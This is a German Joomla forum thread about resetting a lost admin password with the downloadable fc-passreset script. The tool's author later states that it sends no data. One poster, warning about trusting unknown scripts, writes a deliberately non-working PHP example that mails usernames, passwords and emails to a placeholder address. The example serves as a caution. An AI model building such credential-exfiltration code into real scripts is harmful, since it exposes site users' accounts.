Willkommen, Gast
Angemeldet bleiben:

THEMA:

Passwort von admin ändern in myPHP 01 Jan 2023 13:13 #50685

Hallo zusammen, diese Funktion musste ich bisher (zum Glück) noch nie verwenden, deshalb meine Unerfahrenheit.
Hier einen Ausschnitt aus MyPHP  jo_users /  wo muss ich nun den Hebel ansetzen?
Danke für Hilfe
Stefan

PS: wünsche allen einen erfolgreichen Jahresstart!
 
Anhänge:

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 01 Jan 2023 15:13 #50686

Joomla! 3: Professionelle Webentwicklung von David Jardin und Elisa Foltyn - das Standardwerk zu Joomla! 3
Wer nicht über den Anstand verfügt, ein kleines "Thänx" auszusprechen, muss sich nicht wundern, künftig ignoriert zu werden!
Kein Support via PM oder Mail. Entsprechende Anfragen werden ignoriert.
Folgende Benutzer bedankten sich: Runner.one

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 02 Jan 2023 12:31 #50687

Chris, es geht hier um eine Joomla 4 Installation, wobei ich nicht sicher bin, dass alles korrekt abgelaufen ist,
Weil das admin-Passwort einfach nicht akzeptiert wird ..

aber nun mit fc-passreset hat es geklappt, super, vielen Dank Chris

Stefan

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 02 Jan 2023 15:40 #50688

Versuch doch mal das da: docs.joomla.org/How_do_you_recover_or_re...ur_admin_password%3F
und zwar mache ich's immer mit Methode 2.

Die Anleitung ist für Joomla 2.5 und neuer. Sollte also auch für Joomla 4 funktionieren.
Folgende Benutzer bedankten sich: Runner.one

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 02 Jan 2023 16:56 #50689

Christof, mich dünkt mit fc-passreset ist es supereinfach und hat wunderbar geklappt ..
Stefan

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 02 Jan 2023 17:15 #50690

Einfach ist es zweifellos. Aber ich bin äusserst skeptisch und extrem vorsichtig mit Scripts, welche ich von irgendwoher herunterladen kann und die dann auch noch solche Dinge tun wie auf Passwörter zuzugreifen. Mit PHP-Code kenne ich mich nicht wirklich aus. So ist es mir praktisch unmöglich herauszufinden, was das Tool denn sonst noch alles tut. Schau mal Zeile 900 und folgende an. Da werden Benutzerlisten (mit Benutzername, Passwort, E-Mail-Adresse, ...) erzeugt und übermittelt.
    if (isset($_POST['SUBMIT'])) {
        // ## Daten wurden übermittelt
        AusgabeText2();
        CreateUserPass($id, $username, $password, $email, $tabelle, $crypt, $v, $p, $host, $user, $pass, $db, $pre, $dbty);
        Fusszeile();
        unlink($MyFileName);
    } else {
        // ## Benutzerliste erzeugen
        AusgabeText1();
        AusgabeVersion($p, $v);
        CreateUserList($id, $username, $password, $email, $tabelle, $crypt, $v, $p, $host, $user, $pass, $db, $pre, $dbty);
        Fusszeile();
    }
Es wäre ein leichtes, so etwas wie das da in den Code da einzubauen:
<?php$empfaenger = "empfaenger@xyz.com";$betreff = "Benutzerliste von Runner.one";$from = "From: Runner.one <absender@xyz.com>";$text = $username, $password, $email,mail($empfaenger, $betreff, $text, $from);?>
Dieses Beispiel «verhebet nöd», soll aber drastisch aufzeigen, welchen Gefahren man sich unter Umständen aussetzt. Da braucht es schon ganz viel Vertrauen!
Folgende Benutzer bedankten sich: Runner.one

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 02 Jan 2023 17:27 #50691

Christof, da hast du natürlich völlig Recht, obwohl ich mich mit Scriptprogrammierung nicht wirklich auskenne, war ich natürlich schon skeptisch - aber ich dachte, weil ja der Script danach gelöscht wird (habe es kontrolliert) u n d ich danach s o f o r t das Passwort geändert habe, wäre das Risiko einzugehen ....
Stefan

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 02 Jan 2023 20:32 #50692

Einfach ist es zweifellos. Aber ich bin äusserst skeptisch und extrem vorsichtig mit Scripts, welche ich von irgendwoher herunterladen kann und die dann auch noch solche Dinge tun wie auf Passwörter zuzugreifen. Mit PHP-Code kenne ich mich nicht wirklich aus. So ist es mir praktisch unmöglich herauszufinden, was das Tool denn sonst noch alles tut. Schau mal Zeile 900 und folgende an. Da werden Benutzerlisten (mit Benutzername, Passwort, E-Mail-Adresse, ...) erzeugt und übermittelt.

 

Hallo allerseits
ich wurde gerade von einem User des deutschen Joomla-Forums (forum.joomla.de) auf diesen Thread aufmerksam gemacht.
Zunächst einmal:
Christofs Vorsicht ist berechtigt. Natürlich sollte man Scripte aus für einen selbst unbekannten Quellen immer mit höchster Vorsicht benutzen und im Zweifelsfall eben nicht.

Das kleine Passreset-Tool ist allerdings wirklich unkompliziert und macht keinerlei "Blödsinn". Die Auslesen der Benutzerliste dient dazu, dem User des Scriptes die Liste anzuzeigen, damit er sich seinen Account, für den er sich das Passwort neu setzen lassen will, auszusuchen. NICHTS wird irgendwo hingesendet! Jeder der sich mit PHP halbwegs auskennt, wird das im Code auch erkennen können. Absichtlich wurde dieser Code nicht verschlüsselt.

Die Download-Quelle ist unsere Website fc-hosting.de
Sicher nicht alle Joomla-User -aber viele- werden uns als Hoster allerdings kennen. Wir sind nicht ganz unbekannt in der Szene :-)
Ein relativ aktuelles Interviews mit mir in diesem Fall, ist erst vor wenigen Wochen auf den joomla.de Seite publiziert worden:
Falls sich jemand interessiert:
www.joomla.de/news/interviews/789-interview-mit-uwe-flottemesch

In diesem Sinn, noch einen schön Neujahrsguß in die Schweizer Community

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 03 Jan 2023 11:38 #50694

Danke Uwe für Deinen Beitrag. Es wird mir jetzt bewusst, dass meine Antwort an Runner.one beim schnellen Durchlesen so aufgefasst werden könnte, dass ich dieses konkrete Script von Eurer Webseite für verdächtig oder mindestens fragwürdig halte. Das möchte ich hiermit ausdrücklich berichtigen! Meine Warnung und das Codebeispiel sind ganz allgemein gemeint und beziehen sich in keiner Art und Weise auf Deine Firma und Deine Produkte! Es tut mir leid, dass dieser möglicherweise rufschädigende Eindruck entstanden ist. Ich hoffe, dass das hiermit endgültig klargestellt ist.

Viele (Neujahrs-) Grüsse zurück
Christof
 

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Passwort von admin ändern in myPHP 03 Jan 2023 12:20 #50695

Kein Problem. Alles klar!

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

  • Seite:
  • 1